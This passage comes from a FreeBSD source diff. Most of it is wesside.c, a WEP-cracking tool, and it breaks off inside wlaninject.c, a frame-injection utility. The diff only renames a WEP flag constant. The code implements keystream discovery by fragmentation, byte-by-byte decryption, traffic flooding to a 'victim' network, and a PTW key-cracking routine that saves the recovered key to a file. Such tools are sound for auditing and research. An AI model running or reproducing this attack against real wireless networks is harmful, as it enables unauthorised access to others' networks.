ieee80211_frame*) buf; memcpy(wh, &fs->wh, sizeof(*wh)); body = (unsigned char*) wh + sizeof(*wh); memcpy(body, &pi->iv, 3); body += 3; *body++ = 0; // key index fragsize = fs->data + fs->len - fs->ptr; assert(fragsize > 0); if ( (fragsize + 4) > pi->len) { fragsize = pi->len - 4; wh->i_fc[1] |= IEEE80211_FC1_MORE_FRAG; } // last fragment else { wh->i_fc[1] &= ~IEEE80211_FC1_MORE_FRAG; } memcpy(body, fs->ptr, fragsize); crc = crc32(0L, Z_NULL, 0); crc = crc32(crc, body, fragsize); pcrc = (unsigned long*) (body+fragsize); *pcrc = crc; for (i = 0; i < (fragsize + 4); i++) body[i] ^= pi->prga[i]; seq = (unsigned short*) &wh->i_seq; sn = (*seq & IEEE80211_SEQ_SEQ_MASK) >> IEEE80211_SEQ_SEQ_SHIFT; fn = *seq & IEEE80211_SEQ_FRAG_MASK; // printf ("Sent frag (data=%d) (seq=%d fn=%d)\n", fragsize, sn, fn); send_frame(tx, buf, sizeof(*wh) + 4 + fragsize+4); seq = (unsigned short*) &fs->wh.i_seq; *seq = fnseq(++fn, sn); fs->ptr += fragsize; if (fs->ptr - fs->data == fs->len) { // printf("Finished sending frags...\n"); fs->waiting_relay = 1; } } void prepare_fragstate(struct frag_state* fs, int pad) { fs->waiting_relay = 0; fs->len = 8 + 8 + 20 + pad; 
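// Fragment payload layout: LLC/SNAP (8) + ARP header (8) + ARP sender/target addresses (20), plus optional padding so each relayed fragment yields more keystream.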
fs->data = (unsigned char*) malloc(fs->len); if(!fs->data) { perror("malloc()"); exit(1); } fs->ptr = fs->data; do_llc(fs->data, ETHERTYPE_ARP); do_arp(&fs->data[8], ARPOP_REQUEST, mymac, myip, "\x00\x00\x00\x00\x00\x00", "192.168.0.1"); memset(&fs->wh, 0, sizeof(fs->wh)); fill_basic(&fs->wh); memset(fs->wh.i_addr3, 0xff, 6); fs->wh.i_fc[0] |= IEEE80211_FC0_TYPE_DATA; fs->wh.i_fc[1] |= IEEE80211_FC1_DIR_TODS | IEEE80211_FC1_MORE_FRAG | - IEEE80211_FC1_WEP; + IEEE80211_FC1_PROTECTED; memset(&fs->data[8+8+20], 0, pad); } void discover_prga(int tx) { // create packet... if (!fragstate.data) { int pad = 0; if (prgainfo.len >= 20) pad = prgainfo.len*3; prepare_fragstate(&fragstate, pad); } if (!fragstate.waiting_relay) { send_fragment(tx, &fragstate, &prgainfo); if (fragstate.waiting_relay) { if (gettimeofday(&fragstate.last, NULL) == -1) err(1, "gettimeofday()"); } } } void decrypt(int tx) { // gotta initiate if (!decryptstate.fragstate.data) { prepare_fragstate(&decryptstate.fragstate, 0); memcpy(decryptstate.fragstate.wh.i_addr3, MCAST_PREF, 5); decryptstate.fragstate.wh.i_addr3[5] = decryptstate.prgainfo.prga[decryptstate.prgainfo.len-1]; decryptstate.prgainfo.len++; } // guess diff prga byte... if (decryptstate.fragstate.waiting_relay) { unsigned short* seq; decryptstate.prgainfo.prga[decryptstate.prgainfo.len-1]++; #if 0 if (decryptstate.prgainfo.prga[decryptstate.prgainfo.len-1] == 0) { printf("Can't decrpyt!\n"); exit(1); } #endif decryptstate.fragstate.wh.i_addr3[5] = decryptstate.prgainfo.prga[decryptstate.prgainfo.len-1]; decryptstate.fragstate.waiting_relay = 0; decryptstate.fragstate.ptr = decryptstate.fragstate.data; seq = (unsigned short*) &decryptstate.fragstate.wh.i_seq; *seq = fnseq(0, txstate.psent); } send_fragment(tx, &decryptstate.fragstate, &decryptstate.prgainfo); } void flood_inet(tx) { static int send_arp = -1; static unsigned char arp_pkt[128]; static int arp_len; static unsigned char udp_pkt[128]; static int udp_len; static struct timeval last_ip; // need to init packets... 
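// flood_inet() builds one WEP-encrypted broadcast ARP request and one small UDP probe to the flood server, then alternates between them (the ARP at most once every 5 seconds) to keep encrypted traffic flowing.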
if (send_arp == -1) { unsigned char* body; unsigned char* ptr; struct ieee80211_frame* wh; struct ip* ih; struct udphdr* uh; memset(arp_pkt, 0, sizeof(arp_pkt)); memset(udp_pkt, 0, sizeof(udp_pkt)); // construct ARP wh = (struct ieee80211_frame*) arp_pkt; fill_basic(wh); wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; - wh->i_fc[1] |= IEEE80211_FC1_WEP | IEEE80211_FC1_DIR_TODS; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS; memset(wh->i_addr3, 0xff, 6); body = (unsigned char*) wh + sizeof(*wh); ptr = body; ptr += 4; // iv do_llc(ptr, ETHERTYPE_ARP); ptr += 8; do_arp(ptr, ARPOP_REQUEST, mymac, myip, "\x00\x00\x00\x00\x00\x00", netip); wepify(body, 8+8+20); arp_len = sizeof(*wh) + 4 + 8 + 8 + 20 + 4; assert(arp_len < sizeof(arp_pkt)); // construct UDP wh = (struct ieee80211_frame*) udp_pkt; fill_basic(wh); wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; - wh->i_fc[1] |= IEEE80211_FC1_WEP | IEEE80211_FC1_DIR_TODS; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS; memcpy(wh->i_addr3, rtrmac, 6); body = (unsigned char*) wh + sizeof(*wh); ptr = body; ptr += 4; // iv do_llc(ptr, ETHERTYPE_IP); ptr += 8; ih = (struct ip*) ptr; ih->ip_hl = 5; ih->ip_v = 4; ih->ip_tos = 0; ih->ip_len = htons(20+8+5); ih->ip_id = htons(666); ih->ip_off = 0; ih->ip_ttl = 128; ih->ip_p = IPPROTO_UDP; ih->ip_sum = 0; inet_aton(myip, &ih->ip_src); inet_aton(floodip, &ih->ip_dst); ih->ip_sum = in_cksum((unsigned short*)ih, 20); ptr += 20; uh = (struct udphdr*) ptr; uh->uh_sport = htons(floodsport); uh->uh_dport = htons(floodport); uh->uh_ulen = htons(8+5); uh->uh_sum = 0; ptr += 8; strcpy(ptr, "sorbo"); uh->uh_sum = udp_checksum(ptr - 8, 8+5, &ih->ip_src, &ih->ip_dst); wepify(body, 8+20+8+5); udp_len = sizeof(*wh) + 4 + 8 + 20 + 8 + 5 + 4; assert(udp_len < sizeof(udp_pkt)); // bootstrap send_arp = 1; memset(&last_ip, 0, sizeof(last_ip)); } if (send_arp == 1) { struct timeval now; unsigned long sec; if (gettimeofday(&now, NULL) == -1) { perror("gettimeofday()"); exit(1); } sec = now.tv_sec - last_ip.tv_sec; if (sec < 5) return; send_frame(tx, arp_pkt, arp_len); send_arp = 0; } else if (send_arp == 0) { if (gettimeofday(&last_ip, NULL) == -1) { perror("gettimeofday()"); exit(1); } send_frame(tx, udp_pkt, udp_len); send_arp = 1; } else assert(0); } void send_arp(int tx, unsigned short op, unsigned char* srcip, unsigned char* srcmac, unsigned char* dstip, unsigned char* dstmac) { static unsigned char arp_pkt[128]; unsigned char* body; unsigned char* ptr; struct ieee80211_frame* wh; int arp_len; memset(arp_pkt, 0, sizeof(arp_pkt)); // construct ARP wh = (struct ieee80211_frame*) arp_pkt; fill_basic(wh); wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; - wh->i_fc[1] |= IEEE80211_FC1_WEP | IEEE80211_FC1_DIR_TODS; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS; memset(wh->i_addr3, 0xff, 6); body = (unsigned char*) wh + sizeof(*wh); ptr = body; ptr += 4; // iv do_llc(ptr, ETHERTYPE_ARP); ptr += 8; do_arp(ptr, op, srcmac, srcip, dstmac, dstip); wepify(body, 8+8+20); arp_len = sizeof(*wh) + 4 + 8 + 8 + 20 + 4; assert(arp_len < sizeof(arp_pkt)); send_frame(tx, arp_pkt, arp_len); } void can_write(int tx) { static char arp_ip[16]; switch (state) { case FOUND_VICTIM: send_auth(tx); state = SENDING_AUTH; break; case GOT_AUTH: send_assoc(tx); state = SENDING_ASSOC; break; case GOT_ASSOC: if (prgainfo.prga && prgainfo.len < min_prga) { discover_prga(tx); break; } if (decryptstate.cipher) { decrypt(tx); break; } if (!prgainfo.prga) break; if (taptx_len) { send_frame(tx, taptx, taptx_len); taptx_len = 0; break; 
} // try to find rtr mac addr if (netip && !rtrmac) { char* ptr; strcpy(arp_ip, netip); if (!netip_arg) { ptr = strchr(arp_ip, '.'); assert(ptr); ptr = strchr(++ptr, '.'); assert(ptr); ptr = strchr(++ptr, '.'); assert(ptr); strcpy(++ptr, "1"); } if (gettimeofday(&arpsend, NULL) == -1) err(1, "gettimeofday()"); time_print("Sending arp request for: %s\n", arp_ip); send_arp(tx, ARPOP_REQUEST, myip, mymac, arp_ip, "\x00\x00\x00\x00\x00\x00"); // XXX lame rtrmac = (unsigned char*)1; break; } // need to generate traffic... if (rtrmac > (unsigned char*)1 && netip) { if (floodip) flood_inet(tx); else { // XXX lame technique... anyway... im // only interested in flood_inet... // could ping broadcast.... send_arp(tx, ARPOP_REQUEST, myip, mymac, arp_ip, "\x00\x00\x00\x00\x00\x00"); } break; } break; } } void save_key(unsigned char *key, int len) { char tmp[16]; char k[64]; int fd; int rd; assert(len*3 < sizeof(k)); k[0] = 0; while (len--) { sprintf(tmp, "%.2X", *key++); strcat(k, tmp); if (len) strcat(k, ":"); } fd = open(KEY_FILE, O_WRONLY | O_CREAT, 0644); if (fd == -1) err(1, "open()"); printf("\nKey: %s\n", k); rd = write(fd, k, strlen(k)); if (rd == -1) err(1, "write()"); if (rd != strlen(k)) errx(1, "write %d/%d\n", rd, strlen(k)); close(fd); } #define KEYLIMIT (1000000) int do_crack(void) { unsigned char key[PTW_KEYHSBYTES]; if(PTW_computeKey(ptw, key, 13, KEYLIMIT) == 1) { save_key(key, 13); return 1; } if(PTW_computeKey(ptw, key, 5, KEYLIMIT/10) == 1) { save_key(key, 5); return 1; } return 0; } void try_crack() { if (crack_pid) { printf("\n"); time_print("Warning... previous crack still running!\n"); kill_crack(); } if (weplog.fd) { if (fsync(weplog.fd) == -1) err(1, "fsync"); } crack_pid = fork(); if (crack_pid == -1) err(1, "fork"); // child if (crack_pid == 0) { if (!do_crack()) printf("\nCrack unsuccessful\n"); exit(1); } // parent printf("\n"); time_print("Starting crack PID=%d\n", crack_pid); if (gettimeofday(&crack_start, NULL) == -1) err(1, "gettimeofday"); wep_thresh += thresh_incr; } void open_tap() { struct stat st; int s; struct ifreq ifr; unsigned int flags; tapfd = open(TAP_DEV, O_RDWR); if (tapfd == -1) { printf("Can't open tap: %s\n", strerror(errno)); exit(1); } if(fstat(tapfd, &st) == -1) { perror("fstat()"); exit(1); } // feer strcpy(tapdev, devname(st.st_rdev, S_IFCHR)); s = socket(PF_INET, SOCK_DGRAM, 0); if (s == -1) { perror("socket()"); exit(1); } // MTU memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, tapdev); ifr.ifr_mtu = 1500; if (ioctl(s, SIOCSIFMTU, &ifr) == -1) { perror("ioctl(SIOCSIFMTU)"); exit(1); } // set iface up memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, tapdev); if (ioctl(s, SIOCGIFFLAGS, &ifr) == -1) { perror("ioctl(SIOCGIFFLAGS)"); exit(1); } flags = (ifr.ifr_flags & 0xffff) | (ifr.ifr_flagshigh << 16); flags |= IFF_UP; memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, tapdev); ifr.ifr_flags = flags & 0xffff; ifr.ifr_flagshigh = flags >> 16; if (ioctl(s, SIOCSIFFLAGS, &ifr) == -1) { perror("ioctl(SIOCSIFFLAGS)"); exit(1); } close(s); time_print("Opened tap device: %s\n", tapdev); } void read_tap() { unsigned char buf[4096]; struct ether_header* eh; struct ieee80211_frame* wh; int rd; unsigned char* ptr, *body; int dlen; rd = read(tapfd, buf, sizeof(buf)); if (rd == -1) { perror("read()"); exit(1); } dlen = rd - sizeof(*eh); assert(dlen > 0); if (dlen+8 > prgainfo.len) { printf("\n"); // XXX lame message... time_print("Sorry... 
want to send %d but only got %d prga\n", dlen, prgainfo.len); return; } if (taptx_len) { printf("\n"); time_print("Sorry... overflow in TAP queue [of 1 packet =P] overwriting\n"); // XXX could not read instead and get rid of it in select... } assert (rd < (sizeof(buf)-sizeof(*wh) - 8 - 8)); eh = (struct ether_header*) buf; wh = (struct ieee80211_frame*) taptx; memset(wh, 0, sizeof(*wh)); fill_basic(wh); wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; - wh->i_fc[1] |= IEEE80211_FC1_WEP | IEEE80211_FC1_DIR_TODS; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS; memcpy(wh->i_addr2, eh->ether_shost, 6); memcpy(wh->i_addr3, eh->ether_dhost, 6); body = (unsigned char*) wh + sizeof(*wh); ptr = body; ptr += 4; // iv do_llc(ptr, ntohs(eh->ether_type)); ptr += 8; memcpy(ptr, &buf[sizeof(*eh)], dlen); wepify(body, 8+dlen); taptx_len = sizeof(*wh) + 4 + 8 + dlen + 4; assert (taptx_len < sizeof(taptx)); } int elapsedd(struct timeval *past, struct timeval *now) { int el; el = now->tv_sec - past->tv_sec; assert(el >= 0); if (el == 0) { el = now->tv_usec - past->tv_usec; } else { el = (el - 1)*1000*1000; el += 1000*1000-past->tv_usec; el += now->tv_usec; } return el; } static unsigned char *get_80211(unsigned char **data, int *totlen, int *plen) { #define BIT(n) (1<<(n)) struct bpf_hdr *bpfh; struct ieee80211_radiotap_header *rth; uint32_t present; uint8_t rflags; void *ptr; static int nocrc = 0; assert(*totlen); /* bpf hdr */ bpfh = (struct bpf_hdr*) (*data); assert(bpfh->bh_caplen == bpfh->bh_datalen); /* XXX */ *totlen -= bpfh->bh_hdrlen; /* check if more packets */ if ((int)bpfh->bh_caplen < *totlen) { int tot = bpfh->bh_hdrlen + bpfh->bh_caplen; int offset = BPF_WORDALIGN(tot); *data = (char*)bpfh + offset; *totlen -= offset - tot; /* take into account align bytes */ } else if ((int)bpfh->bh_caplen > *totlen) abort(); *plen = bpfh->bh_caplen; *totlen -= bpfh->bh_caplen; assert(*totlen >= 0); /* radiotap */ rth = (struct ieee80211_radiotap_header*) ((char*)bpfh + bpfh->bh_hdrlen); /* XXX cache; drivers won't change this per-packet */ /* check if FCS/CRC is included in packet */ present = le32toh(rth->it_present); if (present & BIT(IEEE80211_RADIOTAP_FLAGS)) { if (present & BIT(IEEE80211_RADIOTAP_TSFT)) rflags = ((const uint8_t *)rth)[8]; else rflags = ((const uint8_t *)rth)[0]; } else rflags = 0; *plen -= rth->it_len; assert(*plen > 0); /* 802.11 CRC */ if (nocrc || (rflags & IEEE80211_RADIOTAP_F_FCS)) { *plen -= IEEE80211_CRC_LEN; nocrc = 1; } ptr = (char*)rth + rth->it_len; return ptr; #undef BIT } static int read_packet(int fd, unsigned char *dst, int len) { static unsigned char buf[4096]; static int totlen = 0; static unsigned char *next = buf; unsigned char *pkt; int plen; assert(len > 0); /* need to read more */ if (totlen == 0) { totlen = read(fd, buf, sizeof(buf)); if (totlen == -1) { totlen = 0; return -1; } next = buf; } /* read 802.11 packet */ pkt = get_80211(&next, &totlen, &plen); if (plen > len) plen = len; assert(plen > 0); memcpy(dst, pkt, plen); return plen; } void own(int wifd) { unsigned char buf[4096]; int rd; fd_set rfd; struct timeval tv; char *pbar = "/-\\|"; char *pbarp = &pbar[0]; struct timeval lasthop; struct timeval now; unsigned int last_wep_count = 0; struct timeval last_wcount; struct timeval last_status; int fd; int largest; weplog.fd = open(WEP_FILE, O_WRONLY | O_APPEND); if (weplog.fd == -1) { struct pcap_file_header pfh; memset(&pfh, 0, sizeof(pfh)); pfh.magic = TCPDUMP_MAGIC; pfh.version_major = PCAP_VERSION_MAJOR; pfh.version_minor = PCAP_VERSION_MINOR; 
pfh.thiszone = 0; pfh.sigfigs = 0; pfh.snaplen = 65535; pfh.linktype = LINKTYPE_IEEE802_11; weplog.fd = open(WEP_FILE, O_WRONLY | O_CREAT, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH); if (weplog.fd != -1) { if (write(weplog.fd, &pfh, sizeof(pfh)) != sizeof(pfh)) err(1, "write()"); } } else { time_print("WARNING: Appending in %s\n", WEP_FILE); } if (weplog.fd == -1) { perror("open()"); exit(1); } fd = open(PRGA_FILE, O_RDONLY); if (fd != -1) { time_print("WARNING: reading prga from %s\n", PRGA_FILE); rd = read(fd, buf, sizeof(buf)); if (rd == -1) { perror("read()"); exit(1); } if (rd >= 8) { set_prga(buf, NULL, &buf[3], rd - 3); } close(fd); } fd = open(DICT_PATH, O_RDONLY); if (fd == -1) { time_print("Creating dictionary directory (%s)\n", DICT_PATH); if (mkdir (DICT_PATH, 0755) == -1) { perror("mkdir()"); exit(1); } } else close(fd); open_tap(); set_if_mac(mymac, tapdev); time_print("Set tap MAC to: %s\n", mac2str(mymac)); if (tapfd > wifd) largest = tapfd; else largest = wifd; if (signal(SIGINT, &cleanup) == SIG_ERR) { perror("signal()"); exit(1); } if (signal (SIGTERM, &cleanup) == SIG_ERR) { perror("signal()"); exit(1); } time_print("Looking for a victim...\n"); if (gettimeofday(&lasthop, NULL) == -1) { perror("gettimeofday()"); exit(1); } memcpy(&last_wcount, &lasthop, sizeof(last_wcount)); memcpy(&last_status, &lasthop, sizeof(last_status)); while (1) { if (gettimeofday(&now, NULL) == -1) { perror("gettimeofday()"); exit(1); } /* check for relay timeout */ if (fragstate.waiting_relay) { int el; el = now.tv_sec - fragstate.last.tv_sec; assert (el >= 0); if (el == 0) { el = now.tv_usec - fragstate.last.tv_usec; } else { el--; el *= 1000*1000; el += 1000*1000 - fragstate.last.tv_usec; el += now.tv_usec; if (el > (1500*1000)) { // printf("\nLAMER timeout\n\n"); free(fragstate.data); fragstate.data = 0; } } } /* check for arp timeout */ if (rtrmac == (unsigned char*) 1) { int el; el = elapsedd(&arpsend, &now); if (el >= (1500*1000)) { rtrmac = 0; } } // status bar if ( (now.tv_sec > last_status.tv_sec ) || ( now.tv_usec - last_status.tv_usec > 100*1000)) { if (crack_pid && (now.tv_sec > last_status.tv_sec)) { check_key(); } if (netip && prgainfo.len >= min_prga && rtrmac > (unsigned char*) 1) { time_print("WEP=%.9d (next crack at %d) IV=%.2x:%.2x:%.2x (rate=%d) \r", weplog.packets, wep_thresh, weplog.iv[0], weplog.iv[1], weplog.iv[2], weplog.rate); fflush(stdout); } else { if (state == FIND_VICTIM) time_print("Chan %.02d %c\r", chaninfo.chan, *pbarp); else if (decryptstate.cipher) { int pos = decryptstate.prgainfo.len - 1; unsigned char prga = decryptstate.prgainfo.prga[pos]; assert(pos); time_print("Guessing PRGA %.2x (IP byte=%d) \r", prga, decryptstate.cipher[pos] ^ prga); } else time_print("%c\r", *pbarp); fflush(stdout); } memcpy(&last_status, &now,sizeof(last_status)); } // check if we are cracking if (crack_pid) { if (now.tv_sec - crack_start.tv_sec >= crack_dur) kill_crack(); } // check TX / retransmit if (txstate.waiting_ack) { unsigned int elapsed = now.tv_sec - txstate.tsent.tv_sec; elapsed *= 1000*1000; elapsed += (now.tv_usec - txstate.tsent.tv_usec); if (elapsed >= ack_timeout) send_frame(wifd, NULL, -1); } // INPUT // select FD_ZERO(&rfd); FD_SET(wifd, &rfd); FD_SET(tapfd, &rfd); tv.tv_sec = 0; tv.tv_usec = 1000*10; rd = select(largest+1, &rfd, NULL, NULL, &tv); if (rd == -1) { perror("select()"); exit(1); } // read if (rd != 0) { // wifi if (FD_ISSET(wifd, &rfd)) { rd = read_packet(wifd, buf, sizeof(buf)); if (rd == 0) return; if (rd == -1) { perror("read()"); exit(1); } 
pbarp++; if(!(*pbarp)) pbarp = &pbar[0]; // input anal(buf, rd, wifd); } // tap if (FD_ISSET(tapfd, &rfd)) { read_tap(); } } // check state and what we do next. if (state == FIND_VICTIM) { if (now.tv_sec > lasthop.tv_sec || ( (now.tv_usec - lasthop.tv_usec) >= 300*1000 )) { int chan = chaninfo.chan; chan++; if(chan > max_chan) chan = 1; set_chan(chan); memcpy(&lasthop, &now, sizeof(lasthop)); } } else { // check if we need to write something... if (!txstate.waiting_ack) can_write(wifd); // roughly! #ifdef MORE_ACCURATE if ( (now.tv_sec - last_wcount.tv_sec) >= 2) { unsigned int elapsed; int secs; int packetz = weplog.packets - last_wep_count; elapsed = 1000*1000; elapsed -= last_wcount.tv_usec; assert(elapsed >= 0); elapsed += now.tv_usec; secs = now.tv_sec - last_wcount.tv_sec; secs--; if (secs > 0) elapsed += (secs*1000*1000); weplog.rate = (int) ((double)packetz/(elapsed/1000.0/1000.0)); #else if ( now.tv_sec > last_wcount.tv_sec) { weplog.rate = weplog.packets - last_wep_count; #endif last_wep_count = weplog.packets; memcpy(&last_wcount, &now, sizeof(now)); if (wep_thresh != -1 && weplog.packets > wep_thresh) try_crack(); } } } } void start(char *dev) { int fd; setup_if(dev); fd = open_bpf(dev, DLT_IEEE802_11_RADIO); ptw = PTW_newattackstate(); if (!ptw) err(1, "PTW_newattackstate()"); own(fd); #if 0 { int i; struct timeval tv; set_chan(11); for (i = 0; i < 10; i++) { gettimeofday(&tv, NULL); send_ack(tx); // usleep(500); printf("%lu\n", tv.tv_usec); } } #endif close(fd); } void usage(char* pname) { printf("Usage: %s \n", pname); printf("-h\t\tthis lame message\n"); printf("-i\t\t\n"); printf("-s\t\t\n"); printf("-m\t\t\n"); printf("-n\t\t\n"); printf("-r\t\t\n"); printf("-a\t\t\n"); printf("-c\t\tdo not crack\n"); printf("-p\t\t\n"); printf("-4\t\t64 bit key\n"); printf("-v\t\tvictim mac\n"); printf("-t\t\t\n"); printf("-f\t\t\n"); exit(0); } void str2mac(unsigned char* dst, unsigned char* mac) { unsigned int macf[6]; int i; if( sscanf(mac, "%x:%x:%x:%x:%x:%x", &macf[0], &macf[1], &macf[2], &macf[3], &macf[4], &macf[5]) != 6) { printf("can't parse mac %s\n", mac); exit(1); } for (i = 0; i < 6; i++) *dst++ = (unsigned char) macf[i]; } int main(int argc, char *argv[]) { unsigned char* dev = "ath0"; unsigned char rtr[6]; unsigned char vic[6]; int ch; if (gettimeofday(&real_start, NULL) == -1) { perror("gettimeofday()"); exit(1); } chaninfo.s = -1; victim.ssid = 0; prgainfo.len = 0; memset(&txstate, 0, sizeof(txstate)); memset(&fragstate, 0, sizeof(fragstate)); memset(&decryptstate, 0, sizeof(decryptstate)); memset(&weplog, 0, sizeof(weplog)); state = FIND_VICTIM; while ((ch = getopt(argc, argv, "hi:s:m:r:a:n:cp:4v:t:f:")) != -1) { switch (ch) { case 'a': str2mac(mymac, optarg); break; case 's': floodip = optarg; break; case 'i': dev = optarg; break; case 'm': strncpy(myip, optarg, sizeof(myip)-1); myip[sizeof(myip)-1] = 0; break; case 'n': netip = optarg; netip_arg = 1; break; case 'r': str2mac(rtr, optarg); rtrmac = rtr; break; case 'v': str2mac(vic, optarg); victim_mac = vic; break; case 'c': wep_thresh = -1; break; case 'p': min_prga = atoi(optarg); break; case 't': thresh_incr = wep_thresh = atoi(optarg); break; case 'f': max_chan = atoi(optarg); break; case '4': bits = 64; break; default: usage(argv[0]); break; } } start(dev); if(chaninfo.s != -1) close(chaninfo.s); if(victim.ssid) free(victim.ssid); exit(0); } diff --git a/tools/tools/net80211/wlaninject/wlaninject.c b/tools/tools/net80211/wlaninject/wlaninject.c index 7527e942794d..215182a95c7b 100644 --- 
a/tools/tools/net80211/wlaninject/wlaninject.c +++ b/tools/tools/net80211/wlaninject/wlaninject.c @@ -1,806 +1,806 @@ /*- * Copyright (c) 2006, Andrea Bittau * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include void setup_if(char *dev, int chan) { int s; struct ifreq ifr; unsigned int flags; struct ifmediareq ifmr; int *mwords; struct ieee80211req ireq; if ((s = socket(PF_INET, SOCK_DGRAM, 0)) == -1) err(1, "socket()"); /* chan */ memset(&ireq, 0, sizeof(ireq)); snprintf(ireq.i_name, sizeof(ireq.i_name), "%s", dev); ireq.i_type = IEEE80211_IOC_CHANNEL; ireq.i_val = chan; if (ioctl(s, SIOCS80211, &ireq) == -1) err(1, "ioctl(SIOCS80211)"); /* UP & PROMISC */ memset(&ifr, 0, sizeof(ifr)); snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", dev); if (ioctl(s, SIOCGIFFLAGS, &ifr) == -1) err(1, "ioctl(SIOCGIFFLAGS)"); flags = (ifr.ifr_flags & 0xffff) | (ifr.ifr_flagshigh << 16); flags |= IFF_UP | IFF_PPROMISC; ifr.ifr_flags = flags & 0xffff; ifr.ifr_flagshigh = flags >> 16; if (ioctl(s, SIOCSIFFLAGS, &ifr) == -1) err(1, "ioctl(SIOCSIFFLAGS)"); close(s); } int open_bpf(char *dev) { char buf[64]; int i; int fd; struct ifreq ifr; unsigned int dlt = DLT_IEEE802_11_RADIO; for (i = 0; i < 64; i++) { sprintf(buf, "/dev/bpf%d", i); fd = open(buf, O_RDWR); if (fd != -1) break; else if (errno != EBUSY) err(1, "open()"); } if (fd == -1) { printf("Can't find bpf\n"); exit(1); } memset(&ifr, 0, sizeof(ifr)); snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", dev); if (ioctl(fd, BIOCSETIF, &ifr) == -1) err(1, "ioctl(BIOCSETIF)"); if (ioctl(fd, BIOCSDLT, &dlt) == -1) err(1, "ioctl(BIOCSDLT)"); i = 1; if (ioctl(fd, BIOCIMMEDIATE, &i) == -1) err(1, "ioctl(BIOCIMMEDIATE)"); return fd; } void inject(int fd, void *buf, int buflen, struct ieee80211_bpf_params *p) { struct iovec iov[2]; int totlen; int rc; iov[0].iov_base = p; iov[0].iov_len = p->ibp_len; iov[1].iov_base = buf; iov[1].iov_len = buflen; totlen = iov[0].iov_len + iov[1].iov_len; rc = writev(fd, iov, sizeof(iov)/sizeof(struct iovec)); if (rc == -1) err(1, "writev()"); if (rc != totlen) { printf("Wrote only %d/%d\n", rc, totlen); exit(1); } } void 
usage(char *progname) { printf("Usage: %s \n" "Physical:\n" "\t-i\t\n" "\t-c\t\n" "\t-N\tno ack\n" "\t-V\t [verify via iface whether packet was mangled]\n" "\t-W\tWME AC\n" "\t-X\ttransmit rate (Mbps)\n" "\t-P\ttransmit power (device units)\n" "802.11:\n" "\t-h\tthis lame message\n" "\t-v\t\n" "\t-t\t\n" "\t-s\t\n" "\t-T\tto ds\n" "\t-F\tfrom ds\n" "\t-m\tmore frags\n" "\t-r\tretry\n" "\t-p\tpower\n" "\t-d\tmore data\n" "\t-w\twep\n" "\t-o\torder\n" "\t-u\t\n" "\t-1\t\n" "\t-2\t\n" "\t-3\t\n" "\t-n\t\n" "\t-f\t\n" "\t-4\t\n" "\t-b\t\n" "\t-l\t\n" "Management:\n" "\t-e\t\n" "\t-S\t\n" "\t-a\t\n" "\t-A\t\n" "\t-C\t\n" "\t-R\tstandard rates\n" , progname); exit(1); } int str2type(const char *type) { #define equal(a,b) (strcasecmp(a,b) == 0) if (equal(type, "mgt")) return IEEE80211_FC0_TYPE_MGT >> IEEE80211_FC0_TYPE_SHIFT; else if (equal(type, "ctl")) return IEEE80211_FC0_TYPE_CTL >> IEEE80211_FC0_TYPE_SHIFT; else if (equal(type, "data")) return IEEE80211_FC0_TYPE_DATA >> IEEE80211_FC0_TYPE_SHIFT; return atoi(type) & 3; #undef equal } int str2subtype(const char *subtype) { #define equal(a,b) (strcasecmp(a,b) == 0) if (equal(subtype, "preq") || equal(subtype, "probereq")) return IEEE80211_FC0_SUBTYPE_PROBE_REQ >> IEEE80211_FC0_SUBTYPE_SHIFT; else if (equal(subtype, "auth")) return IEEE80211_FC0_SUBTYPE_AUTH >> IEEE80211_FC0_SUBTYPE_SHIFT; else if (equal(subtype, "areq") || equal(subtype, "assocreq")) return IEEE80211_FC0_SUBTYPE_ASSOC_REQ >> IEEE80211_FC0_SUBTYPE_SHIFT; else if (equal(subtype, "data")) return IEEE80211_FC0_SUBTYPE_DATA >> IEEE80211_FC0_SUBTYPE_SHIFT; return atoi(subtype) & 0xf; #undef equal } void str2mac(unsigned char *mac, char *str) { unsigned int macf[6]; int i; if (sscanf(str, "%x:%x:%x:%x:%x:%x", &macf[0], &macf[1], &macf[2], &macf[3], &macf[4], &macf[5]) != 6) { printf("can't parse mac %s\n", str); exit(1); } for (i = 0; i < 6; i++) *mac++ = (unsigned char) macf[i]; } int str2wmeac(const char *ac) { #define equal(a,b) (strcasecmp(a,b) == 0) if (equal(ac, 